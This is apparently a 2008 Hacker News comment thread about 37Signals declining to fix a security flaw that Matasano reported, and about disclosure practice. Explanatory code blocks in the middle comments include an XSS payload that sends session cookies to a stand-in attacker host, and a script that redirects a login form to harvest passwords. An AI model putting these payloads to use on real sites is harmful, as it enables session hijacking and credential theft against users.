37Signals "just says no" to feature request: "please fix that security flaw" (matasano.com)
29 points by tptacek on June 26, 2008 | hide | past | favorite | 33 comments

I've gotten that "Soft No" from 37signals, too. I was reporting a bug in the BaseCamp example API and was told that maybe we just had different views of how the API should be designed. I guess I was the only one in the conversation with the view that it should return data instead of raise exceptions and crap out. I no longer use BaseCamp.

I find 37signals pretty stubborn when it comes to listening to its users, in general.

-just my 2 cents

We listen to everyone and 9 out of 10 things we add to our products start out as customer requests. We encourage feedback everywhere we can and interact with our customers as often as we can -- often by posting comments on their own blogs.

But, we also get thousands of requests a year so we can't do everything everyone wants. Many of these requests conflict with one another, and many of them just aren't a good fit for our products (adding Gantt charts to Basecamp, for example). The good ones, however, often make it into the products eventually. Sometimes exactly as requested, sometimes in a different form, but customer requests are almost always the seeds of improvement.

It is our job to be editors and museum curators. We have to decide what makes it and what doesn't for the benefit of the overall product and the overall customer base. No combination of yes or no is going to satisfy everyone, so we have to work on behalf of the majority.

Every company with millions of users has to say no more than they say yes; we're just honest and up front about it. We don't want to set false expectations or promise things we won't be able to deliver.

While this policy may rub some people the wrong way, we think it's the right policy. And seeing that 94%+ of our customers would recommend Basecamp to a friend or colleague, I think we're on the right track. http://basecamphq.com/survey

The issue here is not about adding new features, but fixing bugs and security issues.

Perhaps the 94% are not tech savvy enough to identify these problems?

Incidentally, I've read that specific example of adding Gantt charts to Basecamp before: http://www.37signals.com/svn/posts/1050-ask-37signals-how-do...

Very nicely worded. Now, can you address the OP's concern about security flaws not being fixed? Is a security flaw == to a Gantt chart request?

The curators at the museums don't lock the doors and arm the alarms, Jason.

I'm surprised that so few Basecamp users would recommend it. 94% is not a good number once you take survivorship bias into account: the people who would not recommend your service have already stopped being your customers. 94% says that your churn rate is 6%.

I think they are trying to pretend that they know everything and that they never make mistakes. It's a good image to have, which is why they try so hard to get it.

Unfortunately, the result is customers that can't think for themselves. Anyone with a brain uses someone else's services.

Just post the vulnerability to a forum 14 days after notifying the company.

No. That's one of those ideas that sounds great on paper, and in the real world consistently fucks people over. At this point, by posting the vulnerability, we'd be violating our own code of conduct:


In this case, 37Signals has already been notified. They've been told about other flaws on public forums and not fixed them. What would we be accomplishing?

14 days after? Just disclose the vulnerability to bugtraq and be done with it. Whether the company follows up or not is up to them.

So you think the right plan is to punish the end-users and hope the vendor notices? Do you read Bugtraq? It's a mess.

This strategy works better. Several thousand people have already read Dave's article. We don't have to worry at all about the "wrong people" getting details and messing with other users. This seems like a win-win.

I think a company that goes: "OMG this is a serious vulnerability and there are lots of instances of it throughout the whole system, but we'll fix it ASAP!!" deserves a longer grace period than another that says: "SO WHAT man, our thing just works...".

Did he not mention the flaw, or did I miss it? If he didn't, I'd say this article is linkbait.

The bug is probably something really trivial that affects a small portion of users in an insignificant way. The secrecy about specifics on the author's part seems to be just to spare him embarrassment at this point.

I think the post itself is pretty clear on this score: it's not a major vulnerability. It doesn't prevent us from using the product. It does change the way we use the product.

I'm not sure Dave's too worried about what YC board people think about him, but if that makes you feel better, you can go ahead and keep thinking that.

Here's what I want to accomplish by posting this story on YC (and not Reddit, or anywhere else):

The 37Signals attitude towards feature requests is refreshing and powerful. But if you apply it mindlessly, like they themselves did in this case, you can cause problems for yourself. Not every request is really optional. Maybe this one was --- I'm on the fence leaning towards "they should probably fix this soon" --- but others truly won't be, because they will reveal customer information, lose data, or crash the system.

I think there's a lesson in here somewhere. Maybe it'll just have to wait for an actual incident at 37Signals.

I'm guessing it's this:


Suppose we're both basecamp users. It may be possible for me to steal your session by giving you a link to a shared calendar or something with malicious javascript. Or I can steal the login cookie of one of the admins by luring them to my website with a support request.

I don't think permitting XSS is a good idea in a shared environment.
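The scenario above is the classic stored-XSS pattern. A minimal sketch, assuming the app echoed user-supplied calendar titles into shared pages without escaping (the attacker URL and the `escapeHtml` helper are hypothetical, for illustration only):

```javascript
// Hypothetical stored-XSS sketch: a calendar title an attacker might submit.
// If the app inserts it into a teammate's page verbatim, the script runs
// in that teammate's session and ships their cookie to the attacker.
const title =
  '<script>new Image().src="https://attacker.example/c?"+document.cookie</script>';

// Escaping HTML metacharacters on output neutralizes the payload:
function escapeHtml(s) {
  return s
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;");
}

console.log(escapeHtml(title)); // renders as inert text, not a <script> tag
```

The fix is an output-encoding rule, not a feature: every place user input reaches a shared page has to escape it.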

Apparently they consider XSS a feature. That's a first!

Nope. That's not it.

You can steal cookies with XSS?

Yes. That's why XSS is such a serious security problem. And even if you can't steal cookies, you can still do nasty things like re-target the login form's action to point at your own server and hence steal people's passwords.
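A minimal simulation of the form-retargeting attack described above, runnable outside a browser (a plain object stands in for `document.forms[0]`, and both URLs are made up):

```javascript
// Stand-in for the page's login form (in a real browser: document.forms[0]).
const loginForm = { action: "https://example-app.example/session" };

// The injected script needs only one assignment. The page still looks
// normal afterwards, but submitting sends the credentials to the attacker.
function injectedPayload(form) {
  form.action = "https://attacker.example/harvest";
}

injectedPayload(loginForm);
console.log(loginForm.action); // "https://attacker.example/harvest"
```

This is why "but the cookie is protected" isn't a full defense: once script injection is possible, anything on the page is fair game.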

document.cookie, wow... Guess you learn something new every day. For those interested, this has a good explanation:


I'm gonna go against the grain on this one and call it karma whoring. Here's the formula:

1) Pick a company that has been the source of recent controversy.

2) Find a silly security flaw in one of their products that you can make sound serious with a bit of sensationalism. This should be easy to do, because most web apps have a few silly security holes.

3) Inform the company, and when they inevitably assign the silly flaw a low priority, write an inflammatory blog post and submit it to major news aggregators (e.g. news.yc)

I'm going to go exactly with the grain of all my previous comments here and call you full of it.

Did you read the post? We reported this over a year ago. We notified them repeatedly. We withheld the name of the vendor for over a year as a courtesy. They started with a "soft no", and, when Dave checked in a few months later, they simply ignored our email.

Also: 37Signals has nothing to do with the recent Ruby "controversy" (where by controversy, you mean "someone found security vulnerabilities in it, and some blogger freaked out about it"). 37Signals doesn't produce Ruby; an Open Source team does.

The issue here is that one of 37Signals signature philosophies is "just say no" and be true to your own vision of your product when users request things you don't want to do. Fine. But there's a slippery slope to that logic, and you need to be careful not to fall down it. Some requests that you don't want to do, especially when they come from paying customers, can't be blown off.

Security flaws are bugs. They should be prioritised along with the rest.

That's what 37Signals has done. They've simply put it at the bottom of their list, behind adjusting the pixel alignment of their sidebars.

And yet they're still making plenty of money. Security would be taken seriously if users gave a damn. But they don't.

Depends on who you're talking about. An XSS vulnerability in a web app will get you shelved at a Fortune 500 company. When new apps get deployed on customer DMZs, third-party audits happen. When they find vulnerabilities, you spin dot releases. On a typical 4-dev/2-QA team, in the hopelessly optimistic case where you can turn a QA'd dot release in 2 weeks, you just lost $37,500.
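A back-of-the-envelope check of that figure, assuming a fully loaded cost of about $78 per person-hour (my assumption; the comment doesn't state a rate):

```javascript
const people = 6;        // 4 developers + 2 QA
const hours = 2 * 40;    // a two-week dot-release cycle
const ratePerHour = 78;  // assumed fully loaded cost, $/person-hour

const cost = people * hours * ratePerHour;
console.log(cost); // 37440, close to the quoted $37,500
```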

I do. Look, most users cannot care about this vulnerability because they don't even know about it. Besides, most of them have a good reason not to understand the implications: it's not their job.

I think users deserve more respect even when they're outside their fields of competence.

It's really not a major flaw. But, I mean, come on.

Even if it is not a "major" bug, why has it taken more than a year to fix? Unless 37signals does not consider it to be significant?

"Unless 37signals does not consider it to be significant?"

That's the real disconnect here. It isn't that responding to security vulnerabilities needs a unique process; it's that the author considers this issue significant and 37Signals does not.

I doubt --- kind of a lot, actually --- that any actual developer there even saw our report.

[Edit] On second thought, this is a dumb thing to say, and I retract it. I have no idea if anyone's seen it, which is itself a problem. If I was going to assign a cause to this, it's that the cost of fixing this particular bug may exceed the perceived risk of the vulnerability.
